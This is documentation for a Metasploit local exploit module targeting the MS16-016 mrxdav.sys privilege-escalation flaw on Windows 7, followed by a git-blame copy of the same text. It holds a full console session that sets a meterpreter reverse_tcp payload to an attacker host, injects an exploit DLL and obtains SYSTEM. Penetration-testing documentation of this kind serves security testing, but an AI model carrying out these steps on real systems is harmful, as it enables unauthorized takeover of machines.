documentation/modules/exploit/windows/local/ms16_016_webdav.md

## Introduction

This module exploits a null pointer dereference vulnerability present in the `mrxdav.sys` kernel driver on Windows 7 x86.  The vulnerability is described by MS16-016 and CVE-2016-0051.  The module allows the user to spawn a new payload, such as meterpreter, on the target system with elevated privileges (NT AUTHORITY\SYSTEM)

## Usage

You'll first need to obtain a session on the target system.  Next, once the module is loaded, one simply needs to set the `payload` and `session` options.  From here, running the module will result in the payload being executed with system level privileges.

An example session follows:


```
meterpreter > background
[*] Backgrounding session 5...
msf exploit(handler) > use exploits/windows/local/ms16_016_webdav
msf exploit(ms16_016_webdav) > set session 5
session => 5
msf exploit(ms16_016_webdav) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms16_016_webdav) > set lport 4567
lport => 4567
msf exploit(ms16_016_webdav) > set lhost 192.168.1.203
lhost => 192.168.1.203
msf exploit(ms16_016_webdav) > run

[*] Started reverse TCP handler on 192.168.1.203:4567
[*] Launching notepad to host the exploit...
[+] Process 3204 launched.
[*] Reflectively injecting the exploit DLL into 3204...
[*] Exploit injected ... injecting payload into 3204...
[*] Sending stage (957999 bytes) to 192.168.1.221
[*] Done.  Verify privileges manually or use 'getuid' if using meterpreter to verify exploitation.
[*] Meterpreter session 12 opened (192.168.1.203:4567 -> 192.168.1.221:49266) at 2016-07-05 22:07:34 -0500

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
```
Don't be lazy and spell out "introduction" in docs 2019-09-30 16:58:00 -05:00			`## Introduction`
added module doc for ms16_016_webdav 2016-07-05 22:12:35 -05:00
Make webdav.md look a little better 2018-02-02 13:31:30 -05:00			This module exploits a null pointer dereference vulnerability present in the `mrxdav.sys` kernel driver on Windows 7 x86. The vulnerability is described by MS16-016 and CVE-2016-0051. The module allows the user to spawn a new payload, such as meterpreter, on the target system with elevated privileges (NT AUTHORITY\SYSTEM)
added module doc for ms16_016_webdav 2016-07-05 22:12:35 -05:00
			`## Usage`

Make webdav.md look a little better 2018-02-02 13:31:30 -05:00			You'll first need to obtain a session on the target system. Next, once the module is loaded, one simply needs to set the `payload` and `session` options. From here, running the module will result in the payload being executed with system level privileges.
added module doc for ms16_016_webdav 2016-07-05 22:12:35 -05:00
			`An example session follows:`


			```
			`meterpreter > background`
			`[*] Backgrounding session 5...`
			`msf exploit(handler) > use exploits/windows/local/ms16_016_webdav`
			`msf exploit(ms16_016_webdav) > set session 5`
			`session => 5`
			`msf exploit(ms16_016_webdav) > set payload windows/meterpreter/reverse_tcp`
			`payload => windows/meterpreter/reverse_tcp`
			`msf exploit(ms16_016_webdav) > set lport 4567`
			`lport => 4567`
			`msf exploit(ms16_016_webdav) > set lhost 192.168.1.203`
			`lhost => 192.168.1.203`
			`msf exploit(ms16_016_webdav) > run`

			`[*] Started reverse TCP handler on 192.168.1.203:4567`
			`[*] Launching notepad to host the exploit...`
			`[+] Process 3204 launched.`
			`[*] Reflectively injecting the exploit DLL into 3204...`
			`[*] Exploit injected ... injecting payload into 3204...`
			`[*] Sending stage (957999 bytes) to 192.168.1.221`
			`[*] Done. Verify privileges manually or use 'getuid' if using meterpreter to verify exploitation.`
			`[*] Meterpreter session 12 opened (192.168.1.203:4567 -> 192.168.1.221:49266) at 2016-07-05 22:07:34 -0500`

			`meterpreter > getuid`
			`Server username: NT AUTHORITY\SYSTEM`
typos in mod docs 2016-07-05 22:52:35 -05:00			```